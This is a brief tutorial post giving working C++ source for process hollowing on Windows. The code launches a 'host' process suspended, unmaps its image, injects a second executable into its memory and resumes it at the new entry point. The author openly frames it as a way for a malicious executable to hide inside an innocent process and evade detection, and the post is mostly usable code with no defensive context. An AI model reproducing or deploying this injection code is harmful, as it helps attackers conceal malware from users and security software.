Execute An Executable Inside Another Process

1. I guess you already know about parasites: an organism that lives on or in a host and gets its food from or at the expense of its host. Similar story is possible in computer as well: a malicious executable can run inside another innocent process, and thus, becomes difficult to detect. Assuming that you already know about process memory, memory layout, execution etc. we should come to the code. by Matrix n01d ~ n0 1dentity
2.  
3. Software Requirements
4. Windows SDK
5. Any C++ Compiler
6.  
7. LPBYTE GetFile(char *filePath)
8. {
9. LPBYTE data = NULL;
10. HANDLE h = CreateFileA(filePath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
11. if (h)
12. {
13. DWORD fSize = GetFileSize(h, NULL);
14. data = new BYTE[fSize];
15.  
16. DWORD read = NULL;
17. ReadFile(h, data, fSize, &read, NULL);
18.  
19. CloseHandle(h);
20. }
21. return data;
22. }
23.  
24. The above code reads any given file and returns its contents as byte array, which is processed and finally launched as shown below:
25.  
26. void DoStuff(char *file, char *victimFile)
27. {
28. LPBYTE data = GetFile(file);
29. if (data)
30. {
31. PIMAGE_DOS_HEADER idh = (PIMAGE_DOS_HEADER)data;
32. if (idh->e_magic == IMAGE_DOS_SIGNATURE)
33. {
34. PIMAGE_NT_HEADERS inh = (PIMAGE_NT_HEADERS)(data + idh->e_lfanew);
35. if (inh->Signature == IMAGE_NT_SIGNATURE)
36. {
37. PROCESS_INFORMATION pi;
38. STARTUPINFOA si;
39.  
40. ZeroMemory(&pi, sizeof(pi));
41. ZeroMemory(&si, sizeof(si));
42. si.cb = sizeof(si);
43.  
44. pNtUnmapViewOfSection NtUnmapViewOfSection = (pNtUnmapViewOfSection)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
45.  
46. if (CreateProcessA(NULL, victimFile, NULL, NULL, false, CREATE_SUSPENDED, NULL, NULL, &si, &pi))
47. {
48. CONTEXT c;
49. c.ContextFlags = CONTEXT_FULL;
50. if (GetThreadContext(pi.hThread, &c))
51. {
52. DWORD imageBase = NULL;
53. ReadProcessMemory(pi.hProcess, (LPCVOID)(c.Ebx + 8), &imageBase, sizeof(DWORD), NULL);
54.  
55. if (imageBase == inh->OptionalHeader.ImageBase)
56. {
57. NtUnmapViewOfSection(pi.hProcess, (PVOID)imageBase);
58. }
59.  
60. LPVOID address = VirtualAllocEx(pi.hProcess, (LPVOID)inh->OptionalHeader.ImageBase, inh->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
61. if (address)
62. {
63. // address == inh->OptionalHeader.ImageBase;
64. WriteProcessMemory(pi.hProcess, address, data, inh->OptionalHeader.SizeOfHeaders, NULL);
65. for (int i = 0; i < inh->FileHeader.NumberOfSections; i++)
66. {
67. int offset = idh->e_lfanew + sizeof(IMAGE_NT_HEADERS) + (sizeof(IMAGE_SECTION_HEADER) * i);
68. PIMAGE_SECTION_HEADER ish = (PIMAGE_SECTION_HEADER)(data + offset);
69.  
70. WriteProcessMemory(pi.hProcess, (LPVOID)((DWORD)address + ish->VirtualAddress), data + ish->PointerToRawData, ish->SizeOfRawData, NULL);
71. }
72.  
73. WriteProcessMemory(pi.hProcess, (LPVOID)(c.Ebx + 8), &inh->OptionalHeader.ImageBase, sizeof(DWORD), NULL);
74. c.Eax = (DWORD)address + inh->OptionalHeader.AddressOfEntryPoint;
75. SetThreadContext(pi.hThread, &c);
76.  
77. ResumeThread(pi.hThread);
78. }
79. }
80. }
81. }
82. }
83.  
84. delete data;
85. }
86. }
87.  
88. pNtUnmapViewOfSection is simply a typedef as shown below:
89.  
90. typedef NTSTATUS (WINAPI* pNtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);
91.  
92. Now you can launch any "parasite" process into "host" process:
93.  
94. DoStuff("C:\\parasite.exe", "C:\\host.exe");